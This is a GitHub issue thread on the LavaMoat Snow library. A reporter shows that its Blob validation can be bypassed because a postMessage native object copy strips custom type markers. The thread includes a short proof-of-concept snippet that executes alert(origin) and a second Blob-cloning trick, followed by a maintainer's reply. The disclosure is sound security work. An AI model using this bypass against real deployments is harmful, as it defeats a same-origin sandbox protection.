search

LavaMoat / snow

Use Snow to finally secure your web app's same origin realms!
https://lavamoat.github.io/snow/demo/
MIT License
100 stars 9 forks source link

Blob validation in Snow can be bypassed with native object copy #143

Open terjanq opened 9 months ago

terjanq commented 9 months ago 
var url = URL.createObjectURL(new Blob(['alert(origin)']));
onmessage = e => location = URL.createObjectURL(e.data);
postMessage(new Blob([`<script src="${url}"></script>`], {type:'text/html'}));

postMessage(blob) will trigger a native object copy which will strip the custom properties KIND and TYPE and which passes the assertTypeIsForbidden in https://github.com/LavaMoat/snow/blob/1c8faa81291e6f6dffe62b7106eff2492213375d/src/url.js#L71

terjanq commented 9 months ago

Blob clone could be also done via:

URL.createObjectURL(new Blob(["<h2>asd"], {type:'text/html'}).slice(0, 100, 'text/html'));
naugtur commented 8 months ago

Thanks for contributing. The main maintainer of this project is temporary unavailable, but we'll definitely get back to this. The plan is to tighten some limitations on DOM usage that Snow already introduces and fixing the missing overrides where possible. Some of the work has started (see PR tab)

Meanwhile we're also working with W3C to propose a basic building block of Snow getting introduced into the browser so that all of the monkey-patching can be eliminated in the future. https://www.w3.org/2023/03/secure-the-web-forward/talks/realms.html

Feel free to update this issue with comments on how you think it should be addressed. We may reach out with questions later.